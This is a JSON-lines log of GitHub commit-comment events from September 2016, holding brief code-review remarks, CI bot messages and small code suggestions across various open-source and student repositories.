{"id":"4621227767","type":"CommitCommentEvent","actor":{"login":"spyoungtech"},"repo":{"name":"spyoungtech/easygui"},"payload":{"comment":{"id":19182723,"position":null,"line":null,"path":null,"commit_id":"2f21c8b1bc727ef8c6fcf63eb79d44586762b3f9","created_at":"2016-09-27T00:06:32Z","updated_at":"2016-09-27T00:06:32Z","body":"One caveat is that dictionaries do not preserve order. In order to preserve the order of the choices, `OrderedDict` from `collections` should be used. In Python 3.6, all dicts will preserve order."}},"created_at":"2016-09-27T00:06:32Z"}
{"id":"4621239287","type":"CommitCommentEvent","actor":{"login":"dpb587-pivotal"},"repo":{"name":"cloudfoundry/bosh"},"payload":{"comment":{"id":19182769,"position":5,"line":10,"path":"bosh-director/lib/bosh/director/job_renderer.rb","commit_id":"ded97541c3694f8ac9c01c8c99559355dccb3a39","created_at":"2016-09-27T00:09:57Z","updated_at":"2016-09-27T00:09:57Z","body":"`options` is not used; should be removed"}},"created_at":"2016-09-27T00:09:57Z"}
{"id":"4621239627","type":"CommitCommentEvent","actor":{"login":"kennethlimcp"},"repo":{"name":"spark/docs"},"payload":{"comment":{"id":19182771,"position":16,"line":476,"path":"src/content/reference/cli.md","commit_id":"eab666bb7477c50966c1a0c0dd5da8a32748ac92","created_at":"2016-09-27T00:10:03Z","updated_at":"2016-09-27T00:10:03Z","body":"add `with`"}},"created_at":"2016-09-27T00:10:03Z"}
{"id":"4621241105","type":"CommitCommentEvent","actor":{"login":"dpb587-pivotal"},"repo":{"name":"cloudfoundry/bosh"},"payload":{"comment":{"id":19182774,"position":66,"line":62,"path":"bosh-director/lib/bosh/director/job_renderer.rb","commit_id":"ded97541c3694f8ac9c01c8c99559355dccb3a39","created_at":"2016-09-27T00:10:29Z","updated_at":"2016-09-27T00:10:29Z","body":"instead of an additional conditional, seems better to move it inside line 38"}},"created_at":"2016-09-27T00:10:29Z"}
{"id":"4621242866","type":"CommitCommentEvent","actor":{"login":"dingqz"},"repo":{"name":"dingqz/Java"},"payload":{"comment":{"id":19182783,"position":null,"line":null,"path":null,"commit_id":"50136285409cd8fbb19760c9248f930176a81b86","created_at":"2016-09-27T00:11:02Z","updated_at":"2016-09-27T00:11:02Z","body":"\r\n执行Shape的初始化块...\r\n执行Shape的构造器...\r\n执行Shape的初始化块...\r\n执行Shape的构造器...\r\n黑色三角形\r\n12.0\r\n黄色圆形\r\n18.84955592153876\r\n"}},"created_at":"2016-09-27T00:11:02Z"}
{"id":"4621244059","type":"CommitCommentEvent","actor":{"login":"dpb587-pivotal"},"repo":{"name":"cloudfoundry/bosh"},"payload":{"comment":{"id":19182790,"position":5,"line":161,"path":"bosh-director/lib/bosh/director/jobs/update_deployment.rb","commit_id":"ded97541c3694f8ac9c01c8c99559355dccb3a39","created_at":"2016-09-27T00:11:25Z","updated_at":"2016-09-27T00:11:25Z","body":"if we're taking the approach of args by hash, we should at least only propagate options which are known to be relevant. let's explicitly only pass `dry_run`"}},"created_at":"2016-09-27T00:11:25Z"}
{"id":"4621245149","type":"CommitCommentEvent","actor":{"login":"LucDemortier"},"repo":{"name":"K-Du/dsp"},"payload":{"comment":{"id":19182796,"position":null,"line":null,"path":null,"commit_id":"5a981d6b9a86e3dcc0d03203abd5628ee93008df","created_at":"2016-09-27T00:11:46Z","updated_at":"2016-09-27T00:11:46Z","body":"RE: 05a-python.md\r\ncc: @lucdemortier @reshamametis @aramnath @gfsoileau @rsampath\r\n\r\nHello @K-Du \r\n\r\nVery nice work on the Python problems! 👍 "}},"created_at":"2016-09-27T00:11:46Z"}
{"id":"4621245539","type":"CommitCommentEvent","actor":{"login":"kennethlimcp"},"repo":{"name":"spark/docs"},"payload":{"comment":{"id":19182798,"position":62,"line":522,"path":"src/content/reference/cli.md","commit_id":"eab666bb7477c50966c1a0c0dd5da8a32748ac92","created_at":"2016-09-27T00:11:53Z","updated_at":"2016-09-27T00:11:53Z","body":"`present`"}},"created_at":"2016-09-27T00:11:53Z"}
{"id":"4621247621","type":"CommitCommentEvent","actor":{"login":"TaskClusterRobot"},"repo":{"name":"taskcluster/taskcluster-docs"},"payload":{"comment":{"id":19182806,"position":null,"line":null,"path":null,"commit_id":"7aebbcb17ab402897e1029989c89eebe92f82dea","created_at":"2016-09-27T00:12:29Z","updated_at":"2016-09-27T00:12:29Z","body":"TaskCluster-GitHub: https://tools.taskcluster.net/task-graph-inspector/#E0vrv8Y-SpmJsQl0jeHD0Q"}},"created_at":"2016-09-27T00:12:29Z"}
{"id":"4621249148","type":"CommitCommentEvent","actor":{"login":"kennethlimcp"},"repo":{"name":"spark/docs"},"payload":{"comment":{"id":19182808,"position":87,"line":547,"path":"src/content/reference/cli.md","commit_id":"eab666bb7477c50966c1a0c0dd5da8a32748ac92","created_at":"2016-09-27T00:13:00Z","updated_at":"2016-09-27T00:13:00Z","body":"`strictly`"}},"created_at":"2016-09-27T00:13:00Z"}
{"id":"4621250374","type":"CommitCommentEvent","actor":{"login":"kennethlimcp"},"repo":{"name":"spark/docs"},"payload":{"comment":{"id":19182813,"position":90,"line":550,"path":"src/content/reference/cli.md","commit_id":"eab666bb7477c50966c1a0c0dd5da8a32748ac92","created_at":"2016-09-27T00:13:22Z","updated_at":"2016-09-27T00:13:22Z","body":"`that`"}},"created_at":"2016-09-27T00:13:22Z"}
{"id":"4621252345","type":"CommitCommentEvent","actor":{"login":"blackearth2014"},"repo":{"name":"devernay/openfx-misc"},"payload":{"comment":{"id":19182815,"position":null,"line":null,"path":null,"commit_id":"d80a81ae66911f54a382438efa47d1b1771a29d1","created_at":"2016-09-27T00:13:59Z","updated_at":"2016-09-27T00:13:59Z","body":"I had clicked on the Analyze Frame control using the HSVL parameters and connected it to another image and there was no change to the second image."}},"created_at":"2016-09-27T00:13:59Z"}
{"id":"4621253582","type":"CommitCommentEvent","actor":{"login":"kennethlimcp"},"repo":{"name":"spark/docs"},"payload":{"comment":{"id":19182817,"position":135,"line":595,"path":"src/content/reference/cli.md","commit_id":"eab666bb7477c50966c1a0c0dd5da8a32748ac92","created_at":"2016-09-27T00:14:25Z","updated_at":"2016-09-27T00:14:25Z","body":"`-eth`"}},"created_at":"2016-09-27T00:14:25Z"}
{"id":"4621254477","type":"CommitCommentEvent","actor":{"login":"mcmonkey4eva"},"repo":{"name":"DenizenScript/Denizen2Sponge"},"payload":{"comment":{"id":19182819,"position":69,"line":69,"path":"src/main/java/com/denizenscript/denizen2sponge/commands/entity/SpawnCommand.java","commit_id":"4819aa78b40edc3dec1ef1f2c2f9f8acc6cc8f27","created_at":"2016-09-27T00:14:41Z","updated_at":"2016-09-27T00:14:41Z","body":"No, you put it as `true`, then I said \"switch that to false\" without thinking it through, then I committed a deletion of it myself... guess ya didn't notice the last part, woops."}},"created_at":"2016-09-27T00:14:41Z"}
{"id":"4621255038","type":"CommitCommentEvent","actor":{"login":"mcmonkey4eva"},"repo":{"name":"DenizenScript/Denizen2Sponge"},"payload":{"comment":{"id":19182821,"position":96,"line":96,"path":"src/main/java/com/denizenscript/denizen2sponge/commands/entity/SpawnCommand.java","commit_id":"4819aa78b40edc3dec1ef1f2c2f9f8acc6cc8f27","created_at":"2016-09-27T00:14:52Z","updated_at":"2016-09-27T00:14:52Z","body":"Yeah, that'd do"}},"created_at":"2016-09-27T00:14:52Z"}
{"id":"4621255119","type":"CommitCommentEvent","actor":{"login":"kennethlimcp"},"repo":{"name":"spark/docs"},"payload":{"comment":{"id":19182822,"position":146,"line":606,"path":"src/content/reference/cli.md","commit_id":"eab666bb7477c50966c1a0c0dd5da8a32748ac92","created_at":"2016-09-27T00:14:53Z","updated_at":"2016-09-27T00:14:53Z","body":"`publish`"}},"created_at":"2016-09-27T00:14:53Z"}
{"id":"4621255836","type":"CommitCommentEvent","actor":{"login":"kennethlimcp"},"repo":{"name":"spark/docs"},"payload":{"comment":{"id":19182826,"position":150,"line":610,"path":"src/content/reference/cli.md","commit_id":"eab666bb7477c50966c1a0c0dd5da8a32748ac92","created_at":"2016-09-27T00:15:06Z","updated_at":"2016-09-27T00:15:06Z","body":"`visible to`"}},"created_at":"2016-09-27T00:15:06Z"}
{"id":"4621258592","type":"CommitCommentEvent","actor":{"login":"kennethlimcp"},"repo":{"name":"spark/docs"},"payload":{"comment":{"id":19182836,"position":null,"line":null,"path":null,"commit_id":"eab666bb7477c50966c1a0c0dd5da8a32748ac92","created_at":"2016-09-27T00:15:53Z","updated_at":"2016-09-27T00:15:53Z","body":"@m-mcgowan some minor edits for your next commit :)"}},"created_at":"2016-09-27T00:15:53Z"}
{"id":"4621259317","type":"CommitCommentEvent","actor":{"login":"mcmonkey4eva"},"repo":{"name":"DenizenScript/Denizen2Sponge"},"payload":{"comment":{"id":19182841,"position":100,"line":100,"path":"src/main/java/com/denizenscript/denizen2sponge/commands/entity/SpawnCommand.java","commit_id":"4819aa78b40edc3dec1ef1f2c2f9f8acc6cc8f27","created_at":"2016-09-27T00:16:07Z","updated_at":"2016-09-27T00:16:07Z","body":"idk but I prefer to assume for now that `return` should always follow a handleError.\r\n\r\n(On the inside it throws an exception, so it doesn't matter what follows, we're just making it clear for the compiler that code stops at that line)"}},"created_at":"2016-09-27T00:16:07Z"}
{"id":"4621259374","type":"CommitCommentEvent","actor":{"login":"shurcooL"},"repo":{"name":"client9/misspell"},"payload":{"comment":{"id":19182842,"position":null,"line":null,"path":null,"commit_id":"42efc8dca77034a2495b830f5cb446680f0323f9","created_at":"2016-09-27T00:16:08Z","updated_at":"2016-09-27T00:16:08Z","body":"Did you mean for this to be on master branch?"}},"created_at":"2016-09-27T00:16:08Z"}
{"id":"4621260804","type":"CommitCommentEvent","actor":{"login":"mcmonkey4eva"},"repo":{"name":"DenizenScript/Denizen2Sponge"},"payload":{"comment":{"id":19182854,"position":126,"line":126,"path":"src/main/java/com/denizenscript/denizen2sponge/commands/entity/SpawnCommand.java","commit_id":"4819aa78b40edc3dec1ef1f2c2f9f8acc6cc8f27","created_at":"2016-09-27T00:16:32Z","updated_at":"2016-09-27T00:16:32Z","body":"`// TODO: Allow scripts control of causes` or somethin'"}},"created_at":"2016-09-27T00:16:32Z"}
{"id":"4621261847","type":"CommitCommentEvent","actor":{"login":"headius"},"repo":{"name":"jruby/jruby"},"payload":{"comment":{"id":19182858,"position":null,"line":null,"path":null,"commit_id":"0751b13a7adc80888509bc6bfb6b0ae84d1e0e9b","created_at":"2016-09-27T00:16:52Z","updated_at":"2016-09-27T00:16:52Z","body":"@enebo I just discovered this commit while attempting to add a test for #4178. Perhaps we should be running these tests by now?"}},"created_at":"2016-09-27T00:16:52Z"}
{"id":"4621277894","type":"CommitCommentEvent","actor":{"login":"Lightn1ng"},"repo":{"name":"CTXz/Terminal-Clock"},"payload":{"comment":{"id":19182911,"position":null,"line":null,"path":null,"commit_id":"f2048a7f0e2cddb850e5dba26da80f56b31f9045","created_at":"2016-09-27T00:22:11Z","updated_at":"2016-09-27T00:22:11Z","body":"Now all we need is the weather :D :D :D :D :D :D :D :D :D :D :D "}},"created_at":"2016-09-27T00:22:11Z"}
{"id":"4621278299","type":"CommitCommentEvent","actor":{"login":"kinke"},"repo":{"name":"ldc-developers/dmd-testsuite"},"payload":{"comment":{"id":19182912,"position":17,"line":17,"path":"compilable/ldc_output_filenames.sh","commit_id":"7ecb3b819fff1388f45eb95349dcc7faee91c2a4","created_at":"2016-09-27T00:22:19Z","updated_at":"2016-09-27T00:22:19Z","body":"Note: Without `-f`, `rm` complains about inexistent files."}},"created_at":"2016-09-27T00:22:19Z"}
{"id":"4621281762","type":"CommitCommentEvent","actor":{"login":"noloader"},"repo":{"name":"weidai11/cryptopp"},"payload":{"comment":{"id":19182921,"position":null,"line":null,"path":null,"commit_id":"88b2e70582754b02f65b57a421f9f37c21e986a5","created_at":"2016-09-27T00:23:18Z","updated_at":"2016-09-27T00:23:18Z","body":"I did not want `master-merge.sh` in this commit, but Git would not accept commits with both `<file list> -Sm` or `-Sam`. What a broken tool...."}},"created_at":"2016-09-27T00:23:18Z"}
{"id":"4621282887","type":"CommitCommentEvent","actor":{"login":"mwetter"},"repo":{"name":"iea-annex60/modelica-annex60"},"payload":{"comment":{"id":19182923,"position":5,"line":3,"path":"Annex60/Utilities/Time/Types/ZeroTime.mo","commit_id":"40be5f74bb9c434815ff6c7ea3e0c741e5467286","created_at":"2016-09-27T00:23:42Z","updated_at":"2016-09-27T00:23:42Z","body":"All occurrences of \"GMT\" should be replaced with \"local time\", no?"}},"created_at":"2016-09-27T00:23:42Z"}
{"id":"4621287520","type":"CommitCommentEvent","actor":{"login":"LucDemortier"},"repo":{"name":"K-Du/dsp"},"payload":{"comment":{"id":19182929,"position":null,"line":null,"path":null,"commit_id":"937c7a46537614bcffcf1436e89c7dc7dc409c68","created_at":"2016-09-27T00:25:12Z","updated_at":"2016-09-27T00:25:12Z","body":"RE: 05b-python_advanced.md\r\ncc: @lucdemortier @reshamametis @aramnath @gfsoileau @rsampath\r\n\r\nHello @K-Du \r\n\r\nExcellent work on the advanced Python problems, and also the Markov problem!\r\n\r\n👍 "}},"created_at":"2016-09-27T00:25:12Z"}
{"id":"4621291667","type":"CommitCommentEvent","actor":{"login":"shahsarick"},"repo":{"name":"shahsarick/dsp"},"payload":{"comment":{"id":19182950,"position":null,"line":null,"path":null,"commit_id":"c2d00a27b4846fa0c493a2d4c76d7dc8a5338ba9","created_at":"2016-09-27T00:26:36Z","updated_at":"2016-09-27T00:26:36Z","body":"A.shape\r\nOut[262]: (2L, 3L)\r\n\r\nB.shape\r\nOut[263]: (2L, 2L)\r\n\r\nC.shape\r\nOut[264]: (3L, 2L)\r\n\r\nD.shape\r\nOut[265]: (2L, 3L)\r\n\r\nu.shape\r\nOut[266]: (1L, 4L)\r\n\r\nv.shape\r\nOut[267]: (1L, 4L)\r\n\r\nw.shape\r\nOut[268]: (4L, 1L)\r\n\r\nnp.linalg.norm(u) \r\nOut[269]: 8.6023252670426267"}},"created_at":"2016-09-27T00:26:36Z"}
{"id":"4621295039","type":"CommitCommentEvent","actor":{"login":"katre"},"repo":{"name":"bazelbuild/bazel"},"payload":{"comment":{"id":19182960,"position":null,"line":null,"path":null,"commit_id":"bebbbe5d30f2a05e93780306208e1933d664d71b","created_at":"2016-09-27T00:27:43Z","updated_at":"2016-09-27T00:27:43Z","body":"Fixes #1828 ."}},"created_at":"2016-09-27T00:27:43Z"}
{"id":"4621295209","type":"CommitCommentEvent","actor":{"login":"Jagged"},"repo":{"name":"Jagged/OneOf"},"payload":{"comment":{"id":19182961,"position":null,"line":null,"path":null,"commit_id":"1dc67297c2a8f233e9cc0de6bcc2cfc979ba0f11","created_at":"2016-09-27T00:27:48Z","updated_at":"2016-09-27T00:27:48Z","body":"I've committed in a version of Switcher that only works with Tn types.  I'll have a go at Matcher next."}},"created_at":"2016-09-27T00:27:48Z"}
{"id":"4621299484","type":"CommitCommentEvent","actor":{"login":"LucDemortier"},"repo":{"name":"K-Du/dsp"},"payload":{"comment":{"id":19182973,"position":null,"line":null,"path":null,"commit_id":"332e021e4cf7d0b79e12f9778c799e286198ebe5","created_at":"2016-09-27T00:29:14Z","updated_at":"2016-09-27T00:29:14Z","body":"RE: 06-linear_algebra.md\r\ncc: @lucdemortier @reshamametis @aramnath @gfsoileau @rsampath\r\n\r\nHello @K-Du \r\n\r\nExcellent work on the linear algebra problems and the bonus questions!\r\n\r\n👍 "}},"created_at":"2016-09-27T00:29:14Z"}
{"id":"4621300546","type":"CommitCommentEvent","actor":{"login":"kam187"},"repo":{"name":"ClearSkyTeam/ClearSky"},"payload":{"comment":{"id":19182980,"position":null,"line":null,"path":null,"commit_id":"2b022d9a04c2856025e7f9f375bbaaadd38f46d2","created_at":"2016-09-27T00:29:36Z","updated_at":"2016-09-27T00:29:36Z","body":"I dunno the stupid GitHub client does that randomely :/"}},"created_at":"2016-09-27T00:29:36Z"}
{"id":"4621300832","type":"CommitCommentEvent","actor":{"login":"WikiaJenkins"},"repo":{"name":"Wikia/app"},"payload":{"comment":{"id":19182983,"position":null,"line":null,"path":null,"commit_id":"06fbfd68190103f89f682cb75f57565d55cf3af0","created_at":"2016-09-27T00:29:41Z","updated_at":"2016-09-27T00:29:41Z","body":"**[unitTests_php_branches run failed](http://jenkins.wikia-prod:8080/job/unitTests_php_branches/36150/testReport/) for this commit**"}},"created_at":"2016-09-27T00:29:41Z"}
{"id":"4621300861","type":"CommitCommentEvent","actor":{"login":"WikiaJenkins"},"repo":{"name":"Wikia/app"},"payload":{"comment":{"id":19182985,"position":null,"line":null,"path":null,"commit_id":"06fbfd68190103f89f682cb75f57565d55cf3af0","created_at":"2016-09-27T00:29:43Z","updated_at":"2016-09-27T00:29:43Z","body":"**[unitTests_php_contractual_responsibilities run failed](http://jenkins.wikia-prod:8080/job/unitTests_php_contractual_responsibilities/8723/testReport/) for this commit**"}},"created_at":"2016-09-27T00:29:43Z"}
{"id":"4621317059","type":"CommitCommentEvent","actor":{"login":"Alucard648"},"repo":{"name":"WohlSoft/PGE-Project"},"payload":{"comment":{"id":19183020,"position":null,"line":null,"path":null,"commit_id":"96afc91d841f97c1faa4dc93ed4174f6456e2169","created_at":"2016-09-27T00:35:10Z","updated_at":"2016-09-27T00:35:10Z","body":"Could you do screen-scrolling for door warps within section?"}},"created_at":"2016-09-27T00:35:10Z"}
{"id":"4621320049","type":"CommitCommentEvent","actor":{"login":"Atcold"},"repo":{"name":"torch/dok"},"payload":{"comment":{"id":19183027,"position":274,"line":274,"path":"inline.lua","commit_id":"96728e58b2a57d930023031b367a0c967c70d40d","created_at":"2016-09-27T00:36:12Z","updated_at":"2016-09-27T00:36:12Z","body":"Why is `help` made global?"}},"created_at":"2016-09-27T00:36:12Z"}
{"id":"4621322412","type":"CommitCommentEvent","actor":{"login":"Wohlstand"},"repo":{"name":"WohlSoft/PGE-Project"},"payload":{"comment":{"id":19183042,"position":null,"line":null,"path":null,"commit_id":"96afc91d841f97c1faa4dc93ed4174f6456e2169","created_at":"2016-09-27T00:36:58Z","updated_at":"2016-09-27T00:36:58Z","body":"Yea, I will also add that too"}},"created_at":"2016-09-27T00:36:58Z"}
{"id":"4621329168","type":"CommitCommentEvent","actor":{"login":"noloader"},"repo":{"name":"weidai11/cryptopp"},"payload":{"comment":{"id":19183056,"position":null,"line":null,"path":null,"commit_id":"12579ba116eb9cc20f798c6412da91a397c28c54","created_at":"2016-09-27T00:39:17Z","updated_at":"2016-09-27T00:39:17Z","body":"We could not sign the commit because git offered the ever-so-helpful ***`“not something we can merge”`*** error. Also see the [Comment at Issue 290](http://github.com/weidai11/cryptopp/issues/290#issuecomment-249736573)."}},"created_at":"2016-09-27T00:39:17Z"}
{"id":"4621330840","type":"CommitCommentEvent","actor":{"login":"noloader"},"repo":{"name":"weidai11/cryptopp"},"payload":{"comment":{"id":19183060,"position":null,"line":null,"path":null,"commit_id":"c2cd58ac2713d79311a6aa7f3e532300ef8d7ef6","created_at":"2016-09-27T00:39:54Z","updated_at":"2016-09-27T00:39:54Z","body":"We could not sign the commit because git offered the ever-so-helpful ***`“not something we can merge”`*** error. Also see the [Comment at Issue 290](http://github.com/weidai11/cryptopp/issues/290#issuecomment-249736573)."}},"created_at":"2016-09-27T00:39:54Z"}
{"id":"4621331399","type":"CommitCommentEvent","actor":{"login":"noloader"},"repo":{"name":"weidai11/cryptopp"},"payload":{"comment":{"id":19183063,"position":null,"line":null,"path":null,"commit_id":"de50a409001727e955310398cf702b048d2788ff","created_at":"2016-09-27T00:40:04Z","updated_at":"2016-09-27T00:40:04Z","body":"We could not sign the commit because git offered the ever-so-helpful ***`“not something we can merge”`*** error. Also see the [Comment at Issue 290](http://github.com/weidai11/cryptopp/issues/290#issuecomment-249736573)."}},"created_at":"2016-09-27T00:40:04Z"}
{"id":"4621333829","type":"CommitCommentEvent","actor":{"login":"jeffkaufman"},"repo":{"name":"pagespeed/mod_pagespeed"},"payload":{"comment":{"id":19183066,"position":null,"line":null,"path":null,"commit_id":"75fb7f5a261674c0107b25cd97f4d6f530e601e1","created_at":"2016-09-27T00:40:54Z","updated_at":"2016-09-27T00:40:54Z","body":"@yeputons "}},"created_at":"2016-09-27T00:40:54Z"}
{"id":"4621334921","type":"CommitCommentEvent","actor":{"login":"danielspaniel"},"repo":{"name":"danielspaniel/ember-data-factory-guy"},"payload":{"comment":{"id":19183071,"position":null,"line":null,"path":null,"commit_id":"d5d0dca2d0d9075d963f7f30a1b4094a3558ed8d","created_at":"2016-09-27T00:41:17Z","updated_at":"2016-09-27T00:41:17Z","body":"😄 "}},"created_at":"2016-09-27T00:41:17Z"}
{"id":"4621339704","type":"CommitCommentEvent","actor":{"login":"steelelo"},"repo":{"name":"steelelo/github-workflow-13"},"payload":{"comment":{"id":19183087,"position":1,"line":1,"path":"new-file.md","commit_id":"016e5a9764879f6964a3b8c5e2e6fa292306ba6d","created_at":"2016-09-27T00:42:52Z","updated_at":"2016-09-27T00:42:52Z","body":"**It is formatted using markdown**"}},"created_at":"2016-09-27T00:42:52Z"}
{"id":"4621341940","type":"CommitCommentEvent","actor":{"login":"steelelo"},"repo":{"name":"steelelo/github-workflow-13"},"payload":{"comment":{"id":19183096,"position":1,"line":1,"path":"new-file.md","commit_id":"016e5a9764879f6964a3b8c5e2e6fa292306ba6d","created_at":"2016-09-27T00:43:39Z","updated_at":"2016-09-27T00:43:39Z","body":" 👍 "}},"created_at":"2016-09-27T00:43:39Z"}
{"id":"4621342392","type":"CommitCommentEvent","actor":{"login":"rmacklin"},"repo":{"name":"AppFolioOnboarding/image-sharer-ragurney"},"payload":{"comment":{"id":19183098,"position":5,"line":7,"path":"app/forms/share_form.rb","commit_id":"19feceeafc667015aa9bfb7832c781e0918733f1","created_at":"2016-09-27T00:43:47Z","updated_at":"2016-09-27T00:43:47Z","body":"You can combine these:\r\n```ruby\r\nvalidates :email_address, presence: true, email: true\r\n```"}},"created_at":"2016-09-27T00:43:47Z"}
{"id":"4621350317","type":"CommitCommentEvent","actor":{"login":"nickbradley"},"repo":{"name":"CS310-2016Fall/cpsc310project"},"payload":{"comment":{"id":19183120,"position":null,"line":null,"path":null,"commit_id":"68c1c2abf985055add75ee9526e73e442902ef08","created_at":"2016-09-27T00:46:29Z","updated_at":"2016-09-27T00:46:29Z","body":"@CPSC310Bot "}},"created_at":"2016-09-27T00:46:29Z"}
{"id":"4621350380","type":"CommitCommentEvent","actor":{"login":"CPSC310Bot"},"repo":{"name":"CS310-2016Fall/cpsc310project"},"payload":{"comment":{"id":19183121,"position":null,"line":null,"path":null,"commit_id":"68c1c2abf985055add75ee9526e73e442902ef08","created_at":"2016-09-27T00:46:30Z","updated_at":"2016-09-27T00:46:30Z","body":"Request received; should be processed within 2 minutes."}},"created_at":"2016-09-27T00:46:30Z"}
{"id":"4621351100","type":"CommitCommentEvent","actor":{"login":"CPSC310Bot"},"repo":{"name":"CS310-2016Fall/cpsc310project"},"payload":{"comment":{"id":19183134,"position":null,"line":null,"path":null,"commit_id":"68c1c2abf985055add75ee9526e73e442902ef08","created_at":"2016-09-27T00:46:45Z","updated_at":"2016-09-27T00:46:45Z","body":"4 passing, 30 failing, 0 skipped (11.8%)\nName of first spec to fail: ~Apollo~Inserting a courses dataset should return a 204 if the dataset was not present before."}},"created_at":"2016-09-27T00:46:45Z"}
{"id":"4621359739","type":"CommitCommentEvent","actor":{"login":"koeninger"},"repo":{"name":"apache/spark"},"payload":{"comment":{"id":19183167,"position":157,"line":261,"path":"external/kafka-0-10-sql/src/main/scala/org/apache/spark/sql/kafka010/KafkaSourceProvider.scala","commit_id":"e1671525d142b249749fcd58d5d3bc325fc46c71","created_at":"2016-09-27T00:49:47Z","updated_at":"2016-09-27T00:49:47Z","body":"If letting people start a newly discovered partition at the highest\navailable offset is counter to the guarantees, why is letting someone start\na new app at the highest available offset not counter to the guarantees?\nThat's silently missing data too, but they asked for it...\n\n\"startingoffset\" and \"querystartoffsets\" sound like a way to specify the\nstarting offset, which this isn't.  Assign would be a way of specifying the\nstarting offset(s), for instance, so that's going to get confusing.\n \"backfill\" doesn't mean anything at all to me as a kafka user, which I\nguess is better, but it still doesn't convey that it only takes effect the\nvery first time a query is started.\n\nIf you add the ability to specify a timestamp for the initial starting\nposition of the stream (via kafka time index), would you put that in this\noption, or a different one?\n\nOn Mon, Sep 26, 2016 at 5:48 PM, Michael Armbrust <notifications@github.com>\nwrote:\n\n> I didn't follow the reasoning about why its bad to start newly discovered\n> partitions at the earliest available offset. Doing anything other than that\n> would make the result reliant on the specific processing time of the batch,\n> which is counter to the guarantees we are trying to provide. In the case of\n> stateful operations with retries it could even cause inconsistent results.\n> I'd even go so far as to say that we should throw error or at least a\n> warning in the case when data has been aged out of a newly discovered\n> partition since otherwise we are silently missing data.\n>\n> Failing that, name it app.start.offset.reset or something that conveys\n> that you're only respecting it on initial application startup.\n>\n> I would like to avoid the words auto and reset, because I think they will\n> lead to confusion that this is behaving similar to the kafka config, when\n> really this is letting the user choose to backfill or not when starting a\n> new streaming query. I thought startingoffset was pretty clear that it\n> only applied to the start of the query and not new partitions or behavior\n> on resuming after a failure, but we should debate if there is something\n> clearer. Some options:\n>\n>    - startingoffset = earliest/latest\n>    - querystartoffset(s) = earliest/latest\n>    - backfill = true/false\n>\n> Other ideas?\n>\n> —\n> You are receiving this because you commented.\n> Reply to this email directly, view it on GitHub\n> <https://github.com/apache/spark/commit/e1671525d142b249749fcd58d5d3bc325fc46c71#commitcomment-19181701>,\n> or mute the thread\n> <https://github.com/notifications/unsubscribe-auth/AAGAB1LN4e_8fCYPx-XFryGYpTvz24sIks5quEu7gaJpZM4KG0vm>\n> .\n>\n"}},"created_at":"2016-09-27T00:49:47Z"}
{"id":"4621362038","type":"CommitCommentEvent","actor":{"login":"GlupiJas"},"repo":{"name":"JREAM/design-patterns"},"payload":{"comment":{"id":19183179,"position":null,"line":null,"path":null,"commit_id":"c903f6b55821f6a428dfe907fc1126a955c5b7c6","created_at":"2016-09-27T00:50:32Z","updated_at":"2016-09-27T00:50:32Z","body":"I posted this on your youtube account: under (https://www.youtube.com/watch?v=hKF130rkDK4&index=53&list=PL75B9D91CD69ED950). I have survived... And I enjoyed it as always but I think you have an issue in your script. Tell me what will happen if you extend two classes and then create instance for each of them... From what its look like it will create an instance of the first class and sklip to return preset on seckound. Basicaly in curent state you are only able to extend one class with Singleton class to make it work as intended.\r\n\r\nConsider to rewrite your code as fallow:\r\n\r\n```\r\n    /**\r\n     *  protected method\r\n     *  returns instance of a class for each extended class\r\n     *\r\n     *  @return object\r\n     */\r\n    public static function getInstance(){\r\n        $class = get_called_class();\r\n        if(!self::$instance instanceof $class){\r\n            self::$instance = new static();\r\n            echo \"new \". $class . PHP_EOL; //TEST - (remove this line after testing)\r\n            return  self::$instance; // this line can be skipped or deleted but i left it for debug purpose only\r\n        }\r\n        echo \"old \". $class . PHP_EOL; //TEST - (remove this line after testing)\r\n        return static::$instance;\r\n    }\r\n```\r\n\r\nWas I right ?﻿"}},"created_at":"2016-09-27T00:50:32Z"}
{"id":"4621379473","type":"CommitCommentEvent","actor":{"login":"JoaoEd"},"repo":{"name":"JoaoEd/citacoes"},"payload":{"comment":{"id":19183212,"position":5,"line":3,"path":"filmes.txt","commit_id":"005329527c3ec90fe8f72678d61b59e5cd8e2f6b","created_at":"2016-09-27T00:56:22Z","updated_at":"2016-09-27T00:56:22Z","body":"teste"}},"created_at":"2016-09-27T00:56:22Z"}
{"id":"4621379915","type":"CommitCommentEvent","actor":{"login":"Izeren"},"repo":{"name":"Izeren/math-redactor"},"payload":{"comment":{"id":19183213,"position":12,"line":12,"path":"formulas-converter/formulas-converter/main.cpp","commit_id":"fd51c966fb03316ff377eb405502afff33f79d4a","created_at":"2016-09-27T00:56:31Z","updated_at":"2016-09-27T00:56:31Z","body":"Да, косяк, добавил удаление"}},"created_at":"2016-09-27T00:56:31Z"}
{"id":"4621389700","type":"CommitCommentEvent","actor":{"login":"JackDunnNZ"},"repo":{"name":"JuliaOpt/AmplNLWriter.jl"},"payload":{"comment":{"id":19183257,"position":null,"line":null,"path":null,"commit_id":"75d9df32b7997d6404268ab182a6fbd770e31d43","created_at":"2016-09-27T00:59:56Z","updated_at":"2016-09-27T00:59:56Z","body":"Added in https://github.com/JuliaOpt/AmplNLWriter.jl/commit/b9f30f1c34834382aef2375d228f3f15cd041e23"}},"created_at":"2016-09-27T00:59:56Z"}
{"id":"4621399783","type":"CommitCommentEvent","actor":{"login":"dnffkffk135"},"repo":{"name":"dnffkffk135/Woo2"},"payload":{"comment":{"id":19183277,"position":null,"line":null,"path":null,"commit_id":"208073075a95b1166272d1d1027366734e191f39","created_at":"2016-09-27T01:03:24Z","updated_at":"2016-09-27T01:03:24Z","body":"후덜덜"}},"created_at":"2016-09-27T01:03:24Z"}
{"id":"4621403466","type":"CommitCommentEvent","actor":{"login":"colemancda"},"repo":{"name":"OpenStack-mobile/summit-app-ios"},"payload":{"comment":{"id":19183288,"position":null,"line":null,"path":null,"commit_id":"2552d6b4c5587f2e9e879001f62de936f57b1a72","created_at":"2016-09-27T01:04:50Z","updated_at":"2016-09-27T01:04:50Z","body":"<img width=\"841\" alt=\"screen shot 2016-09-26 at 8 04 18 pm\" src=\"https://cloud.githubusercontent.com/assets/3419766/18856861/6edb5264-8424-11e6-9373-3ff04205fad2.png\">\r\n\r\n@gcutrini  Need to version bump the Watch Extension too."}},"created_at":"2016-09-27T01:04:50Z"}
